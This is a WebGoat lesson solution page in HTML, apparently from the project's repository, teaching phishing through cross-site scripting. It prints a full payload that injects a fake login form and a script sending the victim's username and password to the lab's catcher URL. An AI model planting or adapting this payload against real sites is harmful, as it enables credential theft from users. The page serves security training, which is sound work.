9d8c58bef3
git-svn-id: http://webgoat.googlecode.com/svn/trunk@367 4033779f-a91e-0410-96ef-6bf7bf53c507
68 lines
3.5 KiB
HTML
68 lines
3.5 KiB
HTML
<html>
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
|
|
<title>Solution Lab Block Stored XSS</title>
|
|
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
|
|
</head>
|
|
<body>
|
|
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
|
|
|
|
<p><b>Concept / Topic To Teach:</b><br/>
|
|
It is always a good practice to validate all input on the
|
|
server side. XSS can occur when unvalidated user input is used
|
|
in an HTTP response. With the help of XSS you can do a Phishing
|
|
Attack and add content to a page which looks official. It is very
|
|
hard for a victim to determinate that the content is malicious.
|
|
</p>
|
|
|
|
<p><b>General Goal(s):</b><br/>
|
|
The user should be able to add a form asking for username
|
|
and password. On submit the input should be sent to
|
|
http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
|
|
</p>
|
|
|
|
<b>Solution:</b><br/>
|
|
With XSS it is possible to add further elements to an exsisting Page.
|
|
This solution consists of two parts you have to combine:
|
|
<ul>
|
|
<li>A form the victim has to fill in</li>
|
|
<li>A script which reads the form and sends the gathered information to the attacker</li>
|
|
</ul>
|
|
A Form whith username and password could look like this:<br/>
|
|
<p>
|
|
<form><br><br><HR><H3>This feature requires account login:</H3
|
|
><br><br>Enter Username:<br><input type="text" id="user"
|
|
name="user"><br>Enter Password:<br><input type="password"
|
|
name = "pass"><br></form><br><br><HR>
|
|
<br/><br/>Search for this term and you will see that a form is added to the page.
|
|
</p>
|
|
Now you need a script:
|
|
<p>
|
|
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
|
User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
|
|
XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+
|
|
document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
|
|
</script>
|
|
</p>
|
|
<p>
|
|
This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
|
|
The last step is to put things together. Add a Button to the form which
|
|
calls the script. You can reach this wicht the onclick="myFunction" handler.
|
|
<p>
|
|
The final String looks like this:<br/>
|
|
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.
|
|
User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value);
|
|
XSSImage=new Image; XSSImage.src="http://localhostcatcher?PROPERTY=yes&user="+
|
|
document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
|
|
</script><form><br><br><HR><H3>This feature requires account login:</H3
|
|
><br><br>Enter Username:<br><input type="text" id="user"
|
|
name="user"><br>Enter Password:<br><input type="password"
|
|
name = "pass"><br><input type="submit" name="login"
|
|
value="login" onclick="hack()"></form><br><br><HR>
|
|
</p>
|
|
Search for this String and you will see a form asking for your username and password.
|
|
Fill in these fields and click on the Login Button.
|
|
</body>
|
|
</html>
|
|
|